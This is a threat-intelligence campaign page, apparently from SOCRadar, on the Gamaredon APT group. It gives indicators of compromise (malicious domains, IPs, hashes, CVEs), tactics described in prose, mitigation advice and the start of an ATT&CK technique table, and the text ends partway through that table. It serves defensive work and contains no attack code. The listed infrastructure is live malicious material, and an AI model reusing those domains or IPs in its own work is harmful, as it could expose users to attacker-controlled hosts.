SOC Incident Toolkit
Back to Campaigns
Gamaredon Steals Data Too Quickly

Gamaredon Steals Data Too Quickly

GamaredonUAC-0010ShuckwormActiniumArmageddonPrimitive BearTrident UrsaDEV-0157

The Ukraine Computer Emergency Response Team (CERT-UA) begins to warn entities about stealing data 30 minutes after the first security breach by the Russian-linked APT group Gamaredon (aka UAC-0010).

Indicators of Compromise

Domains (2976)

aukci.spaceitango.spacebitsadmin7.spacegulif.spaceanadima.websitebarrigal.spacedelile.spacefrondo.xyzcaryophyllus.spacegameland.websitebeepapa.spacedortama.spacebitsbitsg.spacebergius.spacefuagrado.spacehuvasi.websitechachand.spacedavaris.spacefirecor.spacedenovar.space+2956 more

Hashes (877)

b449513b9eeaace805518125def9edf11b63567701a9275b6dd1bddf831f035fb2c4a9242b8dda270b7742b026812011b733fd7aff12d7f4a242678ee954ed8be4afb1d75061ec13d1988bc4990b352cf2a7d474133c3474fd0c3c2e0672fca006086c1da4590dcc7f1e10a6be3431e1166286a9e7761f2de9de79d7fda9c397f216bafa84123bacaabdf4ad622eb80d0e2d8425fd8937dc100d65bdc1af725eee29eb3980dff9034b1c539a799cedc1428224855e6d515d81da226448b81521d546e63f4d4922f0eeeed4203991384a503182fa735c4d779ddc111f04926ecfb7bd622b279d3d3927daa64c7c9bc97887d85fccf360d46158e1c01c96bb6cb5db49fe96714ebd9707e5cd31e7f366016e45926ff577cce9c34a73ee1b6efcf9f6fe720f10737e0fdce27de90bdff3f63948c4b05f74b86b11f9b4439e0943d3ad5759e59dde3338a7c352417331a2faf1465c20205aa865fd474060f7bac8c7e78a4ac2af9e94e7ae2c8e8d7099c6449562dc78cd3ce325e7d70da58773740c9ac8ad208c37d0176d2b449cfa175e21881b2b37980a716ab6ba591921da8f6fa078871d89d3f8d22ed77dc331000529a0598f27cf56c6eda32943a9ee8a952ccd73621d52d0c17849cfff55b67961dee1671159e4dd5f2095960a042a20e1c7e188697ef88856063f97dfc8cf8739daeb5d54ac8a551f6d5c325cf8b0466834bfa0a68e897ed7282b49663058f53daa94d273d8f09e20151e39616cafa4d366aa340165930c9d688f58eb408dd7ec1eb55e0dd02e6131465ac31bfb24aa82a72e183b3b6750d0b891a14a193965c918ecec9a36436d41a68a01b91066e5c4d4752fa0282a743628580d179d3bf2358d+857 more

IPv4 (1241)

185.46.9.81194.67.109.19189.108.77.20489.108.76.22689.108.78.82194.58.98.215188.225.86.146194.58.92.102151.248.114.88193.164.150.111195.62.53.63151.248.121.176194.67.116.81194.67.116.180185.46.10.143194.58.122.11089.108.83.235151.248.114.67194.67.109.9092.242.62.181+1221 more

CVEs (5)

CVE-2007-5633CVE-2017-0144CVE-2017-0199CVE-2019-0708CVE-2017-11882

APT Groups

Gamaredon Group

Russian Federation

Notes

<div><span style="font-size: 14px;">Actor and Target: The Gamaredon Group has specifically targeted entities, notably the Ukrainian government, law enforcement, and military officials, mainly conducting cyber espionage activities. This suggests the possibility of Russia using cyber attacks to gain more information on Ukraine and obtain tactical advantages.</span></div><div><span style="font-size: 14px;"><br></span></div><div><span style="font-size: 14px;">Techniques Used: The attacks by the Gamaredon Group have been executed using a remote template injection technique through .docx and .dotm files. This technique works by embedding malicious URLs in the documents, which automatically download when the document is opened.</span></div><div><span style="font-size: 14px;"><br></span></div><div><span style="font-size: 14px;">Malware Propagation: During the attacks, it's observed that threat actors propagated themselves by copying onto removable disks (e.g., USB drives) and potentially targeting air-gapped networks.</span></div><div><span style="font-size: 14px;"><br></span></div><div><span style="font-size: 14px;">C&amp;C Servers: Furthermore, the threat actors used legitimate services as C&amp;C (Command and Control) servers. Specifically, the Telegram messaging service and Telegraph microblogging platform were used for this purpose.</span></div><div><span style="font-size: 14px;"><br></span></div><div><span style="font-size: 14px;">Attack Timing and Detection Process: Most of these attacks started in February/March 2023 and the threat actors were not detected on target networks until May. In some attacks, the threat actors successfully breached the human resources departments of various organizations to gather intelligence about personnel.</span></div><div><span style="font-size: 14px;"><br></span></div><div><div style=""><span style="font-size: 14px;"><b>CONCLUSIONS:</b></span></div><div style=""><span id="docs-internal-guid-760c5b4e-7fff-4976-ba03-15773c6276f8"><p style="line-height:1.38;margin-left: 36pt;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 11pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Based on the analysis of the Gamaredon Group's tactics and techniques, here are some mitigation strategies that can be put into practice:</span></p><br><ol style="margin-top:0;margin-bottom:0;"><li style="list-style-type: decimal; font-size: 11pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline; white-space: pre; margin-left: 36pt;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;" role="presentation"><span style="font-size: 11pt; background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">User Education: One of the most effective mitigation strategies is educating users on the risks of opening unsolicited or suspicious files. Since the group is using .docx and .dotm files to inject malicious scripts, users should be taught how to identify potentially dangerous files.</span></p></li></ol><br><ol style="margin-top:0;margin-bottom:0;"><li style="list-style-type: decimal; font-size: 11pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline; white-space: pre; margin-left: 36pt;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;" role="presentation"><span style="font-size: 11pt; background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Secure Network Connections: Implementing secure network connections and traffic encryption can help prevent Man-in-The-Middle attacks and other forms of eavesdropping.</span></p></li></ol><br><ol style="margin-top:0;margin-bottom:0;"><li style="list-style-type: decimal; font-size: 11pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline; white-space: pre; margin-left: 36pt;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;" role="presentation"><span style="font-size: 11pt; background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Regular Patching and Updating: Since the group uses known vulnerabilities to inject their malicious code, keeping all software up-to-date and patched is vital.</span></p></li></ol><br><ol style="margin-top:0;margin-bottom:0;"><li style="list-style-type: decimal; font-size: 11pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline; white-space: pre; margin-left: 36pt;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;" role="presentation"><span style="font-size: 11pt; background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Endpoint Protection and Antivirus Software: Use robust endpoint protection and antivirus software to detect and mitigate threats. Consider using software that incorporates behavior-based detection, as this can help identify new, unknown threats.</span></p></li></ol><br><ol style="margin-top:0;margin-bottom:0;"><li style="list-style-type: decimal; font-size: 11pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline; white-space: pre; margin-left: 36pt;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;" role="presentation"><span style="font-size: 11pt; background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Monitor Removable Media: Given the group's method of spreading malware through USB drives, it's crucial to monitor and control the use of removable media within the organization.</span></p></li></ol><br><ol style="margin-top:0;margin-bottom:0;"><li style="list-style-type: decimal; font-size: 11pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline; white-space: pre; margin-left: 36pt;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;" role="presentation"><span style="font-size: 11pt; background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Limiting Access: Use the principle of least privilege for system and application permissions. Only provide access to those who absolutely need it.</span></p></li></ol><br><ol style="margin-top:0;margin-bottom:0;"><li style="list-style-type: decimal; font-size: 11pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline; white-space: pre; margin-left: 36pt;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;" role="presentation"><span style="font-size: 11pt; background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Intrusion Detection Systems (IDS): Employ intrusion detection systems to monitor network traffic and identify suspicious activity.</span></p></li></ol><br><ol style="margin-top:0;margin-bottom:0;"><li style="list-style-type: decimal; font-size: 11pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline; white-space: pre; margin-left: 36pt;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;" role="presentation"><span style="font-size: 11pt; background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Incident Response Plan: Prepare an incident response plan to react swiftly and effectively in case of a detected intrusion or attack.</span></p></li></ol><br><ol style="margin-top:0;margin-bottom:0;"><li style="list-style-type: decimal; font-size: 11pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline; white-space: pre; margin-left: 36pt;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;" role="presentation"><span style="font-size: 11pt; background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Regular Auditing and Logging: Maintain detailed logs and perform regular audits to understand normal baseline behavior and recognize any deviations from this norm.</span></p></li></ol><br><ol style="margin-top:0;margin-bottom:0;"><li style="list-style-type: decimal; font-size: 11pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline; white-space: pre; margin-left: 36pt;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;" role="presentation"><span style="font-size: 11pt; background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Harden Systems: Limit the attack surface by disabling unnecessary services, protocols, and software.</span></p></li></ol><br><p style="line-height:1.38;margin-left: 36pt;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 11pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Remember, no single solution can provide complete protection against sophisticated cyber attacks. Instead, </span><span style="font-size: 11pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">SOCRadar</span><span style="font-size: 11pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> </span><a href="https://socradar.io/suites/attack-surface-management/"><span style="font-size: 11pt; font-family: Arial, sans-serif; color: rgb(17, 85, 204); background-color: transparent; font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; text-decoration-line: underline; vertical-align: baseline;">Attack Surface Management </span></a><span style="font-size: 11pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">would be more effective, covering multiple potential attack vectors.</span></p><div><span style="font-size: 11pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"><br></span></div></span></div><div style="font-size: 14px;"><br></div></div><div><br></div>

Mitigation

<div><div><font><b style="color: var(--q-dark);"><font><a href="https://attack.mitre.org/groups/G0047">Gamaredon Group</a> </font></b><span style="color: var(--q-dark);">is a suspected Russian cyber espionage threat group that has targeted military, NGOs, judiciary, law enforcement, and non-profit organizations in Ukraine since at least 2013. The name Gamaredon Group comes from a misspelling of the word "Armageddon", which was detected in the adversary's early campaigns.[1][2][3][4][5]</span><br></font></div><div><font>In November 2021, the Ukrainian government publicly attributed<b><a href="https://attack.mitre.org/groups/G0047"><font> Gamaredon Group</font></a></b> to Russia's Federal Security Service (FSB) Center 18.[6][5]</font></div></div><div><br></div><div><div><b><font>Associated Group Descriptions</font></b></div></div><div><b><br></b></div><div><span id="docs-internal-guid-bc6e42cf-7fff-7156-43d8-84742703bc84"><p style="line-height: 1.44; margin-top: 0pt; margin-bottom: 4pt;"></p><div style="margin-left:0pt;" align="left"><table style="border:none;border-collapse:collapse;"><colgroup><col><col></colgroup><tbody><tr style="height:37.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dee2e6 1.5pt;border-top:solid #dfdfdf 0.75pt;vertical-align:bottom;background-color:#f2f2f2;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.44;text-align: center;background-color:#ffffff;margin-top:0pt;margin-bottom:4pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Name</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dee2e6 1.5pt;border-top:solid #dfdfdf 0.75pt;vertical-align:bottom;background-color:#f2f2f2;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.44;text-align: center;background-color:#ffffff;margin-top:0pt;margin-bottom:4pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Description</span></p></td></tr><tr style="height:43pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dee2e6 1.5pt;vertical-align:top;background-color:#f2f2f2;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.44;background-color:#ffffff;margin-top:0pt;margin-bottom:4pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">IRON TILDEN</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dee2e6 1.5pt;vertical-align:top;background-color:#f2f2f2;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.44;background-color:#ffffff;margin-top:0pt;margin-bottom:0pt;"><a href="https://www.secureworks.com/research/threat-profiles/iron-tilden"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[7]</span></a></p></td></tr><tr style="height:42.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;background-color:#f2f2f2;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.44;background-color:#ffffff;margin-top:0pt;margin-bottom:4pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Primitive Bear</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;background-color:#f2f2f2;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.44;background-color:#ffffff;margin-top:0pt;margin-bottom:0pt;"><a href="https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[8]</span></a></p></td></tr><tr style="height:42.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;background-color:#f2f2f2;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.44;background-color:#ffffff;margin-top:0pt;margin-bottom:4pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">ACTINIUM</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;background-color:#f2f2f2;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.44;background-color:#ffffff;margin-top:0pt;margin-bottom:0pt;"><a href="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[5]</span></a></p></td></tr><tr style="height:42.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;background-color:#f2f2f2;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.44;background-color:#ffffff;margin-top:0pt;margin-bottom:4pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Armageddon</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;background-color:#f2f2f2;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.44;background-color:#ffffff;margin-top:0pt;margin-bottom:0pt;"><a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[4]</span></a></p></td></tr><tr style="height:42.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;background-color:#f2f2f2;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.44;background-color:#ffffff;margin-top:0pt;margin-bottom:4pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Shuckworm</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;background-color:#f2f2f2;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.44;background-color:#ffffff;margin-top:0pt;margin-bottom:0pt;"><a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[4]</span></a></p></td></tr><tr style="height:42.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;background-color:#f2f2f2;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.44;background-color:#ffffff;margin-top:0pt;margin-bottom:4pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">DEV-0157</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;background-color:#f2f2f2;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.44;background-color:#ffffff;margin-top:0pt;margin-bottom:0pt;"><a href="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[5]</span></a></p><p style="line-height:1.44;background-color:#ffffff;margin-top:0pt;margin-bottom:0pt;"><br></p></td></tr></tbody></table></div><div style="margin-left:0pt;" align="left"><span id="docs-internal-guid-77832fdd-7fff-a8ac-ce69-7e0d760cb8fd"><h2 style="line-height: 1.44; margin-top: 0pt; margin-bottom: 4pt;"><span style="font-size: 17pt; color: rgb(57, 67, 76); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"><font><b>Techniques Used</b></font></span></h2><div style="margin-left:0pt;" align="left"><table style="border:none;border-collapse:collapse;"><colgroup><col><col><col><col><col></colgroup><tbody><tr style="height:48.9873046875pt;"><td style="border-width: 0.75pt 0.75pt 1.5pt; border-style: solid; border-color: rgb(223, 223, 223) rgb(223, 223, 223) rgb(222, 226, 230); vertical-align: bottom; padding: 5pt; overflow: hidden; overflow-wrap: break-word;"><p style="line-height:1.38;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Domain</span></p></td><td colspan="2" style="border-width: 0.75pt 0.75pt 1.5pt; border-style: solid; border-color: rgb(223, 223, 223) rgb(223, 223, 223) rgb(222, 226, 230); vertical-align: bottom; padding: 5pt; overflow: hidden; overflow-wrap: break-word;"><p style="line-height:1.38;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">ID</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dee2e6 1.5pt;border-top:solid #dfdfdf 0.75pt;vertical-align:bottom;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Name</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dee2e6 1.5pt;border-top:solid #dfdfdf 0.75pt;vertical-align:bottom;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Use</span></p></td></tr><tr style="height:30pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dee2e6 1.5pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dee2e6 1.5pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1583"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1583</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dee2e6 1.5pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1583/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.001</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dee2e6 1.5pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1583"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Acquire Infrastructure</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1583/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Domains</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dee2e6 1.5pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has registered multiple domains to facilitate payload staging and C2.</span><a href="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[5]</span></a><a href="https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: 